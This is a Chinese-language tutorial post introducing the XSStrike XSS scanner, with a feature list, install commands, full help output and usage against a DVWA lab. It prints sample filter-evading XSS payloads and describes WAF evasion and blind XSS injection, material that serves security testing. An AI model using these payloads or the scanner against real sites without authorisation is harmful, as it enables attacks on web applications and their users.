by python3-XSStrike 測試XSS
1、概述:
XSStrike是一個Cross Site Scripting檢測套件,配備四個手寫解析器,一個智能有效載荷生成器,一個強大的模糊引擎和一個很是快速的爬蟲。php
XSStrike不是像其餘工具那樣注入有效負載並檢查其工做,而是經過多個解析器分析響應,而後經過與模糊引擎集成的上下文分析來保證有效負載。如下是XSStrike生成的有效負載的一些示例:html
}]};(confirm)()//\ <A%0aONMouseOvER%0d=%0d[8].find(confirm)>z </tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z </SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
除此以外,XSStrike還具備爬行,模糊測試,參數發現,WAF檢測功能。它還會掃描DOM XSS漏洞。python
主要特色
- 反射和DOM XSS掃描
- 多線程抓取
- 背景分析
- 可配置的核心
- WAF檢測和規避
- 瀏覽器引擎集成爲零誤報率
- 智能負載發生器
- 手工製做的HTML和JavaScript解析器
- 強大的模糊引擎
- 盲人XSS支持
- 高度研究的工做流程
- 完整的HTTP支持
- 來自文件的Bruteforce有效負載
- 由Photon,Zetanize和Arjun提供支持
- 有效載荷編碼
2、安裝:
必須使用pip3安裝必要的庫:git
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike/
pip3 install -r requirements.txt
python3 xsstrike.py
XSStrike v3.1.1
usage: xsstrike.py [-h] [-u target] [--data paramdata] [-e encode] [--fuzzer]
[--update] [--timeout timeout] [--proxy] [--params]
[--crawl] [--json] [--path] [--seeds args_seeds]
[-f args_file] [-l level] [--headers] [-t threadcount]
[-d delay] [--skip] [--skip-dom] [-v] [--blind]
optional arguments:
-h, --help show this help message and exit
-u target, --url target
url
--data paramdata post data
-e encode, --encode encode
encode payloads
--fuzzer fuzzer
--update update
--timeout timeout timeout
--proxy use prox(y|ies)
--params find params
--crawl crawl
--json treat post data as json
--path inject payloads in the path
--seeds args_seeds load crawling seeds from a file
-f args_file, --file args_file
load payloads from a file
-l level, --level level
level of crawling
--headers add headers
-t threadcount, --threads threadcount
number of threads
-d delay, --delay delay
delay between requests
--skip don't ask to continue
--skip-dom skip dom checking
-v, --vectors verbose output
--blind inject blind xss payload while crawling
3、使用
3.一、--fuzzer
python3 xsstrike.py -v -u "http://192.168.118.132/dvwa/vulnerabilities/xss_r/?name=test#" --fuzzer --header github
3.2 盲注XSS
python xsstrike.py -u http://example.com/page.php?q=query --crawl --blindjson
相關文章
- 1. XSS測試代碼
- 2. XSS Stored 測試
- 3. Xss攻擊測試
- 4. xss測試用例
- 5. 測試xss和xsf
- 6. XSS————一、XSS測試平臺搭建
- 7. Web安全測試之XSS
- 8. XSS攻擊測試代碼
- 9. xss 練習小測試
- 10. 存儲型 XSS 測試
- 更多相關文章...
- • Maven 構建 & 項目測試 - Maven教程
- • Lua 調試(Debug) - Lua 教程
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
- • JDK13 GA發佈:5大特性解讀
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. XSS測試代碼
- 2. XSS Stored 測試
- 3. Xss攻擊測試
- 4. xss測試用例
- 5. 測試xss和xsf
- 6. XSS————一、XSS測試平臺搭建
- 7. Web安全測試之XSS
- 8. XSS攻擊測試代碼
- 9. xss 練習小測試
- 10. 存儲型 XSS 測試